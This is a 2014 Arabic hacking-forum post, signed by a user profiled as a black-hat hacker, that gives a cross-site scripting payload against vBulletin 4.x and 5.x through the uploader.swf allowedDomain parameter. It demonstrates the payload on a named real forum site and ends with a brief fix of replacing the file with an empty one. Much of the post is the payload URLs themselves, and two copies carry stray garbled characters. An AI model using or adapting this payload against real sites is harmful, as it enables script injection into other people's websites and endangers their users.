عرض مشاركة واحدة
قديم 27/02/2014, 14:26   المشاركة رقم: 1
المعلومات
الكاتب:
 Castro  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية Castro

البيانات
التسجيل : Feb 2014
العضوية : 5937
الاهتمامات :
الإقامة :
المواضيع : 6
الردود : 0
المجموع : 6
بمعدل : 0.00 يوميا
الاختراقات : [Gaza Hacker Team]
مجتمعنا : [لم اسجل]
الصنف : Black Hat Hacker
آخر تواجد : 27/02/2014/23:15
سبب الغياب : حاظر
معدل التقييم: 0
نقاط التقييم: 10
Castro is on a distinguished road
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة

 Palestine


الإتصالات
الحالة:
Castro غير متواجد حالياً
وسائل الإتصال:

افتراضي ثغرة vBulletin 4.X and 5.X uploader.swf XSS

ثغرة Xss تعمل على

vBulletin 4.X and 5.X

كود:
Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ***8203;9;}//
كود:
Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ***8203;9;}//
EX:

كود:
www.quadsuk.net/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//
ترقيع الثغرة


لجميع نسخ الجيل الرابع :-

ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم

كود:
                       /clientscript/yui/uploader/assets/uploader.swf
لجميع نسخ الجيل الخامس :-

ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم

كود:
                       /core/clientscript/yui/uploader/assets/uploader.swf



آخر مواضيع » Castro

عرض البوم صور Castro   رد مع اقتباس
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115